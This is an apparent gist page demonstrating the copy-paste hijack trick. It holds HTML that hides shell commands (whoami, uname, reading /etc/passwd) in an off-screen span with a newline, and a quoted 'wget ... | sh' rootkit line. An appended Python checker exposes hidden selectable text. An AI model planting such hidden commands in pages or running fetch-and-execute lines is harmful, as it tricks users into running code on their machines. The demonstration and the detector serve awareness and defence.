Last active: April 23, 2018 18:43
copy / paste hijack trick
<html>
  <head>
    <title>sneaky copy-paste terminal example</title>
    <style>
      .codeblock {
        background-color: lightyellow;
        border: 1px dotted black;
        margin-left: 50px;
        display: inline-block;
      }
    </style>
  </head>
  <body>
    <font size=3>
      <h3>intro</h3>
      <p>This shows an example of how it is dangerous to copy and paste lines of code from a website into your terminal, even if they are seemingly plaintext. I'm not talking about that shit where it's obviously bad to run something like <i>wget http://evilhax.or/rootkit.sh -O - | sh</i><br>Oh no, my friends. This is far worse. This is not anything new to the world, I had just happened to see it mentioned elsewhere earlier today and I found it interesting.</p>
      <h3>hax</h3>
      <ul>
        <li>select the line of code in the box below with your mouse</li>
        <li>copy it using ctrl+c (cmd+c on osx, whatever...)</li>
        <li>paste it into your terminal</li>
        <li>be..fucking...amazed...</li>
      </ul>
      <!-- The span is positioned off-screen, so it is not drawn but still sits inside
           the mouse selection. The trailing <br> becomes a newline in the clipboard,
           which is what makes a terminal execute the hidden commands on paste. -->
      <p class="codeblock">
        wget <span style="position: absolute; left: -100px; top: -100px">/dev/null; clear; echo -n "Hey there ";whoami|tr -d '\n';echo -e "\nheres some info from your box:\n";uname -a; hostname; head -n1 /etc/passwd<br></span>http://www.nullable.software/hi/copypasta.html
      </p>
      <h3>references</h3>
      <ul>
        <li>http://www.ush.it/team/ascii/hack-tricks_253C_CCC2008/wysinwyc/what_you_see_is_not_what_you_copy.txt</li>
        <li>http://www.reddit.com/r/netsec/comments/1bv359/dont_copypaste_from_website_to_terminal_demo/</li>
      </ul>
    </font>
  </body>
</html>
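As an added example (not part of the gist), a small Python checker that walks a page's HTML the way a mouse selection would and separates the text you see from the text you would actually paste; the style heuristic is an assumption that only inspects inline styles, and the sample input is the code box from the gist above.

```python
import re
from html.parser import HTMLParser

# Heuristic (assumption, not a full CSS engine): inline styles that keep text
# out of sight while it stays selectable, e.g. the off-screen span on this page.
def style_hides_text(style: str) -> bool:
    s = style.lower()
    off_screen = (re.search(r"position\s*:\s*absolute", s)
                  and re.search(r"(left|top|right|bottom)\s*:\s*-\d+", s))
    other = re.search(r"display\s*:\s*none|visibility\s*:\s*hidden|font-size\s*:\s*0"
                      r"(?:px|em|pt)?\s*(?:;|$)|opacity\s*:\s*0(?:\.0+)?\s*(?:;|$)", s)
    return bool(off_screen or other)
VOID = {"br", "hr", "img", "input", "meta", "link"}   # elements with no end tag
class CopyAudit(HTMLParser):
    # Splits page text into what the eye sees and what a selection carries.
    def __init__(self):
        super().__init__()
        self.stack = []                    # one flag per open element: is it hidden?
        self.visible, self.copied, self.hidden = [], [], []

    def handle_starttag(self, tag, attrs):
        if tag == "br":                    # a hidden <br> is the newline that runs the line
            self.handle_data("\n")
        if tag in VOID:
            return
        parent = self.stack[-1] if self.stack else False
        self.stack.append(parent or style_hides_text(dict(attrs).get("style") or ""))

    def handle_endtag(self, tag):
        if tag not in VOID and self.stack:
            self.stack.pop()

    def handle_data(self, data):
        self.copied.append(data)
        (self.hidden if self.stack and self.stack[-1] else self.visible).append(data)

def audit_copy(html: str) -> dict:
    # Returns the visible text, the text a copy would carry, and the hidden part.
    p = CopyAudit(); p.feed(html); p.close()
    return {k: "".join(v).strip() for k, v in
            (("visible", p.visible), ("copied", p.copied), ("hidden", p.hidden))}
# Constructed sample: the code box from the page, kept as a raw string.
SAMPLE = r'''<p class="codeblock">
wget <span style="position: absolute; left: -100px; top: -100px">/dev/null; clear; echo -n "Hey there ";whoami|tr -d '\n';echo -e "\nheres some info from your box:\n";uname -a; hostname; head -n1 /etc/passwd<br></span>http://www.nullable.software/hi/copypasta.html
</p>'''
if __name__ == "__main__":
    for key, text in audit_copy(SAMPLE).items():
        print(f"{key:>8}: {text!r}")
```

Running it on the sample prints a one-line "visible" string and a multi-line "copied" string, which is the difference a terminal paste would act on.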